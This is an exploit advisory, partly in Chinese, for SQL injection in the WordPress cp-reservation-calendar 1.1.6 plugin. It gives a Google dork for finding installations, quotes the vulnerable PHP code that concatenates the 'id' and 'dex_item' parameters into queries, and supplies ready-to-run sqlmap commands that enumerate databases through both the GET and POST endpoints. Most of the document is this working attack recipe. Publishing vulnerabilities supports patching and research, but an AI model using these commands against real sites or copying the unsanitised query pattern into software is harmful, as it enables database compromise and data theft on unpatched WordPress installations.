<p># Exploit Title: WordPress: cp-reservation-calendar 1.1.6 SQLi injection]</p><p># Date: 2015-09-15</p><p># Google Dork: Index of /wp-content/plugins/cp-reservation-calendar/</p><p># Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]</p><p># Software Link: <a href="https://downloads.wordpress.org/plugin/cp-reservation-calendar.zip">https://downloads.wordpress.org/plugin/cp-reservation-calendar.zip</a></p><p># Version: 1.1.6</p><p># OWASP Top10: A1-Injection</p><p>在WordPress cp reservation calendar Plugin v1.6插件中存在sql注入</p><p>漏洞文件:dex_reservations.php</p><p> </p><p>The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.6.</p><p>Exploitation of the remote sql injection web vulnerability requires no user interaction or privilege web-application user account.</p><p>Successful exploitation of the remote sql injection results in database management system, web-server and...
<p># Exploit Title: WordPress: cp-reservation-calendar 1.1.6 SQLi injection]</p><p># Date: 2015-09-15</p><p># Google Dork: Index of /wp-content/plugins/cp-reservation-calendar/</p><p># Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]</p><p># Software Link: <a href="https://downloads.wordpress.org/plugin/cp-reservation-calendar.zip">https://downloads.wordpress.org/plugin/cp-reservation-calendar.zip</a></p><p># Version: 1.1.6</p><p># OWASP Top10: A1-Injection</p><p>在WordPress cp reservation calendar Plugin v1.6插件中存在sql注入</p><p>漏洞文件:dex_reservations.php</p><p> </p><p>The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.6.</p><p>Exploitation of the remote sql injection web vulnerability requires no user interaction or privilege web-application user account.</p><p>Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.</p><p> </p><p>============================</p><p>漏洞代码code...</p><p>============================</p><p> </p><p>function dex_reservations_calendar_load2() {</p><p> global $wpdb;</p><p> if ( ! isset( $_GET['dex_reservations_calendar_load2'] ) || $_GET['dex_reservations_calendar_load2'] != '1' )</p><p> return;</p><p> @ob_clean();</p><p> header("Cache-Control: no-store, no-cache, must-revalidate");</p><p> header("Pragma: no-cache");</p><p> </p><p> //following line is vulnerable...</p><p> </p><p> $calid = str_replace (TDE_RESERVATIONCAL_PREFIX, "",$_GET["id"]);</p><p> $query = "SELECT * FROM ".TDE_RESERVATIONCALENDAR_DATA_TABLE." where ".TDE_RESERVATIONDATA_IDCALENDAR."='".$calid."'";</p><p> $row_array = $wpdb->get_results($query,ARRAY_A);</p><p> foreach ($row_array as $row)</p><p> { </p><p> $d1 = date("m/d/Y", strtotime($row[TDE_RESERVATIONDATA_DATETIME_S])); </p><p> $d2 = date("m/d/Y", strtotime($row[TDE_RESERVATIONDATA_DATETIME_E]));</p><p> </p><p> echo $d1."-".$d2."\n";</p><p> echo $row[TDE_RESERVATIONDATA_TITLE]."\n";</p><p> echo $row[TDE_RESERVATIONDATA_DESCRIPTION]."\n*-*\n";</p><p> }</p><p> </p><p> exit();</p><p>}</p><p><br></p><p> 访问漏洞url如下:</p><p> <a href="http://localhost/wordpress/?action=dex_reservations_calendar_load2&dex_reservations_calendar_load2=1&id=1">http://localhost/wordpress/?action=dex_reservations_calendar_load2&dex_reservations_calendar_load2=1&id=1</a></p><p>------------------------------------------------------------------------------------</p><p>使用sqlmap进行注入:</p><p>python sqlmap.py --url="<a href="http://localhost/wordpress/?action=dex_reservations_calendar_load2&dex_reservations_calendar_load2=1&id=1">http://localhost/wordpress/?action=dex_reservations_calendar_load2&dex_reservations_calendar_load2=1&id=1</a>"</p><p> -p id --level=5 --risk=3 --dbms="MySQL" --dbs</p><p> </p><p>##########################################################################</p><p> </p><p>如下url存在post注入:<br></p><p><a href="http://localhost/wordpress/?action=dex_reservations_check_posted_data">http://localhost/wordpress/?action=dex_reservations_check_posted_data</a></p><p>post 参数:</p><p>-------------------------------------</p><p>dex_reservations_post=1&dex_item=1</p><p>------------------------------------</p><p> 任何用户都可以通过该url进行注入,发生注入的参数为[dex_item]</p><p>======================</p><p> 发生漏洞代码 code(位于 dex_reservations.php)</p><p>=====================</p><p>function dex_reservations_get_option ($field, $default_value)</p><p>{</p><p> global $wpdb, $dex_option_buffered_item, $dex_option_buffered_id;</p><p> if ($dex_option_buffered_id == CP_CALENDAR_ID)</p><p> $value = $dex_option_buffered_item->$field;</p><p> else</p><p> {</p><p> $myrows = $wpdb->get_results( "SELECT * FROM ".DEX_RESERVATIONS_CONFIG_TABLE_NAME." WHERE id=".CP_CALENDAR_ID );</p><p> $value = $myrows[0]->$field;</p><p> $dex_option_buffered_item = $myrows[0];</p><p> $dex_option_buffered_id = CP_CALENDAR_ID;</p><p> }</p><p> if ($value == '' && $dex_option_buffered_item->calendar_language == '')</p><p> $value = $default_value;</p><p> return $value;</p><p>}</p><p> </p><p> 函数使用了CP_CALENDAR_ID参数却没有对该参数进行过滤</p><p>---------------------------------------------------------------------------- </p><p>配合sqlmap进行注入::::</p><p> </p><p>python sqlmap.py --url="<a href="http://localhost/wordpress/?action=dex_reservations_check_posted_data">http://localhost/wordpress/?action=dex_reservations_check_posted_data</a>" --data="dex_reservations_post=1&dex_item=1"</p><p> -p dex_item --dbms="MySQL" --level=5 --risk=3</p>
